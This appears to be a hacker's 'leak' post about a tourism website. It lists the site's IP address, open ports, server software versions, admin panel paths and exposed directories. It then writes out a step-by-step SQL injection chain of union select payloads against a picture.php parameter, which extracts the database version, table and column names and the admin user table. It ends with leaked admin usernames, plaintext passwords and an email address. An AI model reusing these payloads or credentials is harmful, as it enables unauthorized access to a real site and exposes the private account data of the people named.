Leak On Sunsets.com

1.  
2. __________ ________
3. |__________| | |
4. | | | ____|
5. | | | |
6. | | | |____
7. |_| () |_______| ()
8. ----------------------------------------
9. Database Information:
10.  
11.  
12. Username/Email: sunsetsdbevent@localhost
13.  
14. ################################
15. _______________________________
16. ###############################
17. Vulnerable Links [OPEN]:
18.  
19. http://www.sunsets.com/Connections/
20.  
21. http://www.sunsets.com/includes/
22.  
23. http://www.sunsets.com/images
24.  
25. http://www.sunsets.com/flash/
26. _______________________________
27. Url: sunsets.com/robots.txt
28.  
29.  
30. File: robots.txt
31.  
32.  
33. ###############################
34. #
35.  
36. User-agent: *
37.  
38. # list folders robots are not allowed to index
39.  
40. Disallow: /images/
41. Disallow: /includes/
42. Disallow: /adminweb/
43. Disallow: /adminsun/
44. Disallow: /error/
45. Disallow: /flash/
46. Disallow: /Connections/
47.  
48.  
49. #
50. # list specific files robots are not allowed to index
51. #
52. Disallow: /tutorials/meta_tags.html
53. Disallow: /tutorials/custom_error_page.html
54. #
55. # End of robots.txt file
56. #
57. ###############################
58. ######################################
59. --------------------------------------
60. Site IP: 216.227.221.116
61.  
62.  
63. Open Ports:
64.  
65. 22
66.  
67.  
68. 53
69.  
70.  
71. 80
72.  
73.  
74. 110
75.  
76.  
77. 443
78.  
79.  
80. 2083
81.  
82.  
83. 2087
84.  
85.  
86. 3306
87.  
88.  
89. Info On Site:
90.  
91. HTTP Server : Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_
92. auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
93.  
94.  
95. Powered By : None
96.  
97.  
98. Last Modified : None
99. ______________________________________________
100. Administrator Panels:
101.  
102. www.sunsets.com/controlpanel/
103.  
104. www.sunsets.com/cpanel/
105.  
106. www.sunsets.com/home.html
107.  
108. www.sunsets.com/kpanel/
109.  
110. http://www.sunsets.com/adminweb/
111.  
112. http://www.sunsets.com/adminsun/
113. _______________________________________________
114. http://www.sunsets.com/kincardine/index.php - Regular Website
115.  
116.  
117. VULN/SQLi Link: http://www.sunsets.com/kincardine/picture.php?ID=69'
118.  
119.  
120. Tables: 18
121. [error on 19]
122.  
123.  
124. Link To Vuln: http://www.sunsets.com/kincardine/picture.php?ID=null%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
125.  
126.  
127. Version: http://www.sunsets.com/kincardine/picture.php?ID=null%20union%20select%201,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
128.  
129.  
130. Version: 5.1.70-cll
131.  
132.  
133. Link For Tables: http://www.sunsets.com/kincardine/picture.php?ID=null%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.tables%20where%20table_schema=database%28%29--
134.  
135.  
136. Link for Columns: www.sunsets.com/kincardine/picture.php?ID=null union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_schema=database()--
137.  
138.  
139.  
140. Link To Leak Users: http://www.sunsets.com/kincardine/picture.php?ID=null%20union%20select%201,2,3,group_concat%28Username,0x3a,Password,0x3a,EmailAddress%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20AdminUsers--
141.  
142.  
143.  
144. Users/Admin's:
145.  
146. Username: webmaster
147.  
148.  
149. Password: w9bsmart
150.  
151.  
152. Email: osmart@owensound.ca
153. -----------------------------
154.  
155. Username: kinctourism
156.  
157. Password: cculture*Met
158.  
159. Email: Unknown
160. ------------------------------------
161. Tables:
162.  
163. Activities
164.  
165. AdminMenu - Possibility
166.  
167. AdminUsers -Yes
168.  
169. Comments
170.  
171. Comments_Type
172.  
173. Corporate
174.  
175. Customer_Type
176.  
177. Customers -Yes
178.  
179. Faq
180.  
181. Faq_categories
182.  
183. FeatureLinks
184.  
185. FeatureLinks_Category
186.  
187. ImageWrap
188.  
189. Images
190.  
191. ImagesSource
192.  
193. ImagesType
194.  
195. Images_Flash
196.  
197. Images_Main
198.  
199. Links
200.  
201. LinksCategory
202.  
203. Navigation
204.  
205. News
206.  
207. News_Type
208.  
209. Newsletter
210.  
211. Orders
212.  
213. Pages
214.  
215. Product_Images
216.  
217. Products
218.  
219. Report
220.  
221. menu_mnu
222.  
223. navigation_menu
224. --------------------------------
225. Columns:
226.  
227. [Main]
228.  
229. Username
230.  
231. Password
232.  
233. EmailAddress
234.  
235.  
236. Email
237.  
238.  
239. UserID
240.  
241.  
242. AdministratorLevel
243.  
244.  
245. Address
246.  
247.  
248. Phone
249.  
250.  
251. Name
252.  
253.  
254.  
255. ActivityID,Title,Description,ExpandedContent,Content,Category,CategoryTwo,Sort,Display,Web,WebLink,WebTarget,Updated,AdminMID,MLabel,MLabelDesc,MLink,MDisplay,MSort,MTarget,AdministratorLevel,Webmaster,UserID,Username,Password,Level,FirstName,LastName,Department,EmailAddress,Webmaster,CommentID,CommentType,Comment,DisplayComment,SortComment,Name,Community,StateCountry,ApprovedComment,UpdatedComment,CtID,TypeLabel,TypeSort,InfoID,Organization,ShortDescription,Address,Phone,Fax,Email,OfficeHours,Copyright,CTypeID,CLabel,Comment,CSort,CustomerID,Type,Customer,Description,Location,DisplayLink,WebLink,CustomerSort,DisplayCustomer,Updated,FaqID,FCategory,Question,Content,FDisplay,FSort,Random,UseImage,Image,Updated,FaqCatID,Category,FCatSort,FCatDisplay,LinkID,DisplayListing,ShowOnList,Type,Category,Title,Description,ExpandedContent,Content,WebAddress,Target,Sort,UseImage,ImageFile,Comments,Updated,FCID,Label,DisplayCat,SortCat,WrapID,Direction,ImageID,Cover,MainImage,Title,ImageCategory,ImageFile,Size,Price,Propor